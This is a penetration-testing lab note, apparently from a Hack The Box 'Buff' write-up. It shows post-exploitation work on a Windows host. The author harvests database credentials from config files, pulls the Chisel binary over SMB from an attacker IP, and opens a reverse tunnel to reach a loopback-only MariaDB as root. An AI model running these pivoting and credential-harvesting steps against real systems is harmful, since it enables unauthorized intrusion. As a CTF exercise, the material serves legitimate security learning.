DB

I saw earlier that the target port 3306 is up and listening on the loopback address

c:\xampp\htdocs\gym>dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7
 
 directory of c:\xampp\htdocs\gym
 
27/01/2023  11:31    <DIR>          .
27/01/2023  11:31    <DIR>          ..
16/06/2020  15:31                66 .gitattributes
16/06/2020  15:31           246,305 4.jpg
17/06/2020  13:44             6,277 about.php
16/06/2020  15:31    <DIR>          att
16/06/2020  15:31             3,541 att.php
16/06/2020  15:31    <DIR>          boot
17/06/2020  13:45             5,109 contact.php
16/06/2020  15:31             5,187 edit.php
16/06/2020  15:31               479 editp.php
16/06/2020  15:31    <DIR>          ex
17/06/2020  13:34             6,980 facilities.php
16/06/2020  15:31             5,598 Feedback.php
16/06/2020  15:31             3,579 home.php
16/06/2020  15:31    <DIR>          img
16/06/2020  17:50    <DIR>          include
17/06/2020  13:13             6,237 index.php
16/06/2020  15:31            18,025 LICENSE
16/06/2020  15:31             1,525 Navjeet.jpg
16/06/2020  15:31               140 New Text Document.txt
17/06/2020  13:33             8,731 packages.php
16/06/2020  15:31    <DIR>          profile
16/06/2020  15:31               309 README.md
16/06/2020  15:31             4,104 register.php
16/06/2020  15:31                44 register_success.php
02/11/2022  22:02             9,290 shell.php
16/06/2020  15:31               570 subfeed.php
16/06/2020  15:31             1,903 table.sql
16/06/2020  15:31             1,395 up.php
27/01/2023  10:58    <DIR>          upload
16/06/2020  15:31             1,308 upload.php
16/06/2020  15:31    <DIR>          workouts
              23 File(s)        339,704 bytes
              10 Dir(s)   8,284,041,216 bytes free
 
c:\xampp\htdocs\gym>type "New Text Document.txt"
$mysql_host = "mysql16.000webhost.com";
$mysql_database = "a8743500_secure";
$mysql_user = "a8743500_secure";
$mysql_password = "ipad12345";

I found the DB credential.

c:\xampp\htdocs\gym>where /R \ mysql.exe
c:\xampp\mysql\bin\mysql.exe

I initially though that I would need to tunnel the port in order to access the backend DB on the loopback address However, the MySQL cli tool appears to be installed in the target system

c:\xampp\htdocs\gym> C:\xampp\mysql\bin\mysql.exe -u "a8743500_secure" -p "ipad12345"

Attempting to signin to the backend DB fails as the process just hangs. I guess that I would need to tunnel it after all

Tunneling with Chisel

C:\tmp> copy \\10.10.14.11\smb\chiselx64.exe .
        1 file(s) copied.

I transferred Chisel to the target system over SMB

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ chisel server -p 55555 --reverse
2023/01/27 12:55:13 server: Reverse tunnelling enabled
2023/01/27 12:55:13 server: Fingerprint 941xbNdaSdfnTHmKf4xF8dknUO/M8/eKThQ0cdyl1X8=
2023/01/27 12:55:13 server: Listening on http://0.0.0.0:55555

Starting a Chisel server on Kali over port 55555

C:\tmp> chiselx64.exe client 10.10.14.11:55555 R:33060:127.0.0.1:3306
2023/01/27 11:56:03 client: Connecting to ws://10.10.14.11:55555
2023/01/27 11:56:03 client: Connected (Latency 32.6495ms)

From the target system, tunneling 127.0.0.1:3306 to Kali’s 33060

Connection received. Now I should be able to interact with the backend DB on Kali over port 33060

MySQL

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ mysql -h 127.0.0.1 -P 33060 -ua8743500_secure -pipad12345
error 1045 (28000): Access denied for user 'a8743500_secure'@'localhost' (using password: YES)

I got access denied. Wrong credential?

c:\xampp\htdocs\gym\include>type psl-config.php
<?php
/**
 * These are the database login details
 */  
define("HOST", "localhost");     // The host you want to connect to.
define("USER", "root");    // The database username. 
define("PASSWORD", "");    // The database password. 
define("DATABASE", "gym");    // The database name.
 
define("CAN_REGISTER", "any");
define("DEFAULT_ROLE", "member");
 
define("SECURE", FALSE);    // FOR DEVELOPMENT ONLY!!!!
?>

found another db credential at c:\xampp\htdocs\gym\include\psl-config.php The username is root and there is no password.

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ mysql -h 127.0.0.1 -P 33060 -u root    
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 63
server version: 10.4.11-MariaDB mariadb.org binary distribution
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]>

Yeap, that was the one.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| phpmyadmin         |
| table              |
| test               |
+--------------------+
6 rows in set (0.466 sec)

Where is gym? I see table and test

MariaDB [(none)]> use table;
Database changed
MariaDB [table]> show tables;
Empty set (0.032 sec)
MariaDB [table]> use test;
Database changed
MariaDB [test]> show tables;
Empty set (0.030 sec)

They both are empty

I guess it’s deadend

InfoSec LAB

Explorer

Buff_DB

DB

Tunneling with Chisel

MySQL

Interactive Graph View

Table of Contents

Backlinks